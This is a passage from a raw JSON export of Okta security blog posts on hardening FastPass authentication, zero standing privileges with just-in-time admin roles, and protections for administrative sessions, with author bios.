\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/trusted-app-filters-for-fastpass.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trusted App Filters\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\": an ability for administrators to allowlist a specific binary that is authorized to call the Okta Verify client.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Verify also includes self-tampering protection on supported platforms, to prevent reverse engineering and unauthorized modifications of Okta FastPass. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta's North Star is to ensure malware cannot compromise FastPass authentication without root access to the device.  \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Anticipating future attacks against FastPass\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has made great progress on hardening FastPass in a relatively short period of time using threat-informed product development. We are very grateful to the security researchers inside and out of Okta for helping get it there.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Still, we know threat actors will continue to innovate. 
Okta will continue to strive to compress the feedback loop between security research and product innovation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given recent investments Okta has made to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/protectingadminsessions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"constrain session tokens\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/api.htm#editallowednetworkzones\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"API tokens\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (by client or location), it’s prudent to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.linkedin.com/posts/andysteingruebl_fighting-cookie-theft-using-device-bound-activity-7211087871741419520-PfZP/?utm_source=share&utm_medium=member_desktop\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"anticipate\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that adversaries will see a need to again pivot to malware-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We hope this short history of FastPass hardening illustrates Okta’s determination to bring best-in-class security to phishing resistant, passwordless authentication. \",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"A short history of hardening Okta FastPass."},"updatedAt":"2025-02-10T00:14:20.398Z","secAuthor":[{"id":"8528ce08-133a-57ef-acc1-823b04af8cc3","bio":{"bio":"Johannes leads Okta's Zero-Trust architecture and its FastPass enterprise authenticator. 
Using feedback from small and large enterprise companies as well as security researchers, he is continuously working on making strong phishing resistant authentication available to everyone and in every scenario while also mitigating new attack patterns in a world without passwords. He is passionate about identity and security standards, and is active in the FIDO Alliance."},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/7wQGE40H11s37DZaw9OprP/d33bdbe4c1fe8340995e0949585aa810/js_profile.jpg"},"name":"Johannes Stockmann","jobTitle":"Senior Software Architect","slug":"/hackers/johannes-stockmann","node_locale":"en"},{"id":"c235ce3a-92ed-529f-8c59-c8f845622414","bio":{"bio":"Dan is a VP of Engineering at Okta, focusing on Access Management in the Workforce Identity Cloud.  He joined Okta to make the world safer and more prosperous by mitigating the dangers of threat actors bypassing access restrictions through better technology, and ensuring end users are delighted by a frictionless, flexible experience of getting their work done instead of being sent through endless frustrating speed bumps.  
Prior to Okta, Dan enjoyed a long career working as a leader and developer on a variety of products, from the metal up to the cloud."},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/BRLA6lxnpMPhu6417V1jh/728f80c09ee397529628653da15555ba/dp_lowres.jpeg"},"name":"Dan Post","jobTitle":"VP, Development Engineering","slug":"dan-post","node_locale":"en"},{"id":"180f95d6-983c-585e-ab25-442a52dbff38","bio":{"bio":"Okta Product Security, formerly known as the REX (Research and Exploitation) team."},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3xrOguKhVQ2NoNX2glBxze/397b30dd03c11f0bcdb96671b3010b37/Okta_Aura_CMYK_Black.png"},"name":"Okta Product Security","jobTitle":"The artists formerly known as the REX (Research and Exploitation) team.","slug":"product-security-team","node_locale":"en"}]},{"slug":"caseforzerostandingprivileges","id":"32162a36-ca3e-5d05-9e6f-2a395b976a91","title":"The Case for Zero Standing Privileges ","date":"2024-08-19T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The principle of least privilege is one of the best known laws of information security: and it’s often the most difficult to put into practice. The principle demands that a user should only be given access to the resources and permissions they require to complete their tasks, and no more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When I speak with peer CISOs they routinely state that they don’t have much trouble applying this principle to regular users, but they are still challenged when privileged access comes under scrutiny. Privileged Access Management (PAM) provides the seatbelt that makes it safe to grant privileged roles. 
Specifically, PAM addresses the risk posed by adversary access to administrator credentials by vaulting the passwords used for access to privileged resources. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"PAM has come a long way: in a former life we actually stored passwords on pieces of paper inside a physical vault! Vaulting software and services allows us to gate access to the credentials used for privileged access, and to require controls like step-up authentication and/or dual authorization before an administrator can “check out” the password. PAM can and should also offer an ability to automatically rotate a password after use by a human administrator.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today’s PAM solutions have served us well when it comes to securing access to privileged on-prem resources like databases and servers. However, they tend to fall short when a privileged resource, such as a non-federated, privileged account in a B2B SaaS app, is accessible via the public internet. The vaulting capability can ensure that only an authenticated and authorized user can check out the credential for that privileged account, but if that password is entered into a SaaS app via an interactive browser session, the PAM solution can do little to protect the password from being saved (inadvertently) in the user browser or intercepted by malware. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past 12 months, we have observed a number of attacks where the vaulting of a password wasn’t sufficient to prevent adversary access to administrative resources.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These risks arise because:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We are dealing with an Infostealer epidemic:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" The sheer size of the “combo lists” of stolen credential pairs and session tokens distributed on the internet today is staggering.  Most of the enterprise credentials caught up in these dumps were extracted from the personally-owned devices or the devices of temporary contractors - devices that were \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"not\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" subject to endpoint protection controls. Any password submitted via the browser of a malware-compromised device is vulnerable to interception. (You could say that the security teams of today are paying the price for the surge in the use of personally-owned devices that arose during the pandemic).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attackers are targeting native/non-federated/local accounts\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": Attackers are wise to the challenge posed by user accounts protected by single sign-on (SSO) and multifactor authentication (MFA). 
We have observed an increase in the targeting of non-federated accounts that allow direct access to the SaaS application. Authentication policies for non-federated accounts are typically weaker than those federated with an SSO provider. Numerous high-profile attacks involve the same pattern over again: the password or long-lived session token for a privileged account is extracted from an unmanaged device using infostealer malware, and is often sold on or distributed to other attackers.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These risks can be mitigated if:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security teams have tools to discover unexpected local/non-federated paths of access into SaaS applications, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security teams can protect credentials with a cloud-native PAM that can auto-rotate credentials for SaaS applications after they are accessed by a human user.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has made it our mission to build the tools that mitigate these risks (see \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/products/privileged-access/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Privileged Access\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/identity-security-posture-management/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identity 
Security Posture Management\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"). But as with any adversarial contest, “the enemy gets a vote” too: we should not expect their capabilities to stand still. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So every organization also needs to be thinking about how to reduce or limit the blast radius when attackers successfully take over a highly privileged account. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enter (near) zero standing privileges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nZero standing privileges takes the principle of least privileged access to the nth degree. As the words suggest, the idealized state is that a grand total of zero accounts have standing administrative permissions in applications. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I say “idealized” state because most systems are designed to have at least one interactive account with a\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"level of administrative privilege. Resiliency demands the use of a break glass account - a shared account that can be relied on if the accounts assigned to individual human administrators are inaccessible. So if we’re being pragmatic, our North Star should be to reduce standing privileges to “near zero”. The minimum goal should be to have fewer user and machine accounts with highly privileged roles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You won’t need to look very hard to find opportunities to downscope access. 
Large-scale studies have demonstrated the extent of the problem of over-privileged access: almost every user and machine account in the cloud is \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/unit42_cloud-threat-report-vol6.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"granted permissions that lie unused [pdf]\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Microsoft’s research shows that \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://learn.microsoft.com/en-us/security/zero-trust/develop/overprivileged-permissions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"less than 10%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of permissions granted to Azure apps are ever used.  \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There is a role for everyone in the identity ecosystem to play in whittling those permissions down:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cloud service providers have a role to play in helping their most security-conscious customers pare back the privileges that come with standard/out-of-the-box roles. 
Okta has made progress on the number of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/about-role-permissions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"granular permissions available\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to create custom admin roles, and more are on the way.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customers of these services need to use custom admin roles to reduce the number of user and machine accounts with excessive permissions. Customers should also consider the myriad open source tools available for identifying excessive permissions in cloud infrastructure and applications, if not licensed Cloud Infrastructure Entitlement Management (CIEM) solutions.\\n\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Supporting zero standing privileges in the workforce\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nAs part of the Okta Secure Identity Commitment, Okta recently shipped \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/least-privilege-for-your-critical-identity-roles-introducing-govern-okta-admin-roles/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Govern Okta Admin Roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", a license-free add-on for every customer of the Okta platform. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Govern Okta Admin Roles allows for the most privileged administrative roles and permissions \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"in Okta\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" to be granted on a just-in-time basis. It’s built using some of the same tools our customers use to govern roles in third party applications (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/products/identity-governance/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Governance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to Okta administrative roles can be configured to require dual authorisation, trigger customizable workflows, and be scheduled to expire after a specified time interval. My team recently recorded a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.youtube.com/watch?v=5vEXBdAxBfU&t=816s\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"live demo of this capability\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for the Risky Business podcast if you'd like to learn more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I suggest taking a three-step approach to embracing this new capability:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Study what features your most privileged administrators use frequently. 
You are more than likely to find that the majority of permissions assigned to any given role are excessive. Work collectively to map out what baseline permissions are required for the roles in your organization.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Substitute standard roles for Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that only include the permissions your administrators require most frequently.  \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configure access request and approval flows for the more privileged and less frequently used permissions, such that they are available on a JIT basis and protected by dual authorization. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Part II of this blog series, we’ll unpack \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/about-role-permissions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"which permissions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in Okta best meet the criteria for JIT access. 
\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Why privileged users need to embrace Just-In-Time role assignment."},"updatedAt":"2025-02-10T00:13:13.630Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"<p>David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies. </p>\n\n<p>Prior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs. </p>\n\n<p>Bradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. 
in Computer Science from the University of Sydney.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/protectingadminsessions","id":"2e1f659a-b9fd-5dea-9e0f-0590e90a187c","title":"Protecting Administrative Sessions in Okta","date":"2024-03-21T08:13:16+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Privileged users have always been and should always expect to be under constant attack from motivated adversaries.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the last 90 days, Okta has devoted many of our most skilled resources into a program of work that dramatically hardens the Okta Admin Console, resulting in a number of new features, a subset of which are listed below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"New 
Feature\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Availability\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/apply-ip-or-asn-binding-to-admin-console?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ASN Session Binding\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta automatically revokes an administrative session if the ASN (Autonomous System Number) observed during an API or web request differs from the ASN recorded when the session was established.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"GA, on by default in Okta Admin Console from October 23, 
2023\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/apply-ip-or-asn-binding-to-admin-console?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP Session Binding\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customer administrators can automatically revoke an administrative session if the IP address observed during an API or web request differs from the IP address recorded when the session was established.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"EA in Okta Admin Console from February 7, 2024\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"EA in Okta Workflows Admin, Okta Access Requests and Okta Privileged Access (OPA) from March 1, 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/admin-session-lifetime-idle-timeout-security-enhancements?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"New Default Maximum and Idle Session Duration 
\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Default session timeouts in Okta Admin apps have been set to a 12-hour session lifetime and a 15-minute idle time.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"GA from January 8, 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta admins are prompted for re-authentication when they perform critical tasks in the Admin Console.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"EA in Okta Admin Console from February 7, 
2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/deliver-zero-standing-privileges-for-okta-admin-roles-governance-for-okta-admin-roles?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Govern Okta Admin Roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customers can govern Okta Admin Roles via time-bound access requests and automated access reviews\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Gradual rollout in Okta Admin Console begins April 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/okta-will-require-multi-factor-authentication-mfa-to-access-the-okta-admin-console?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require MFA for access to Admin Console\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will prevent administrators from creating authentication policies that only 
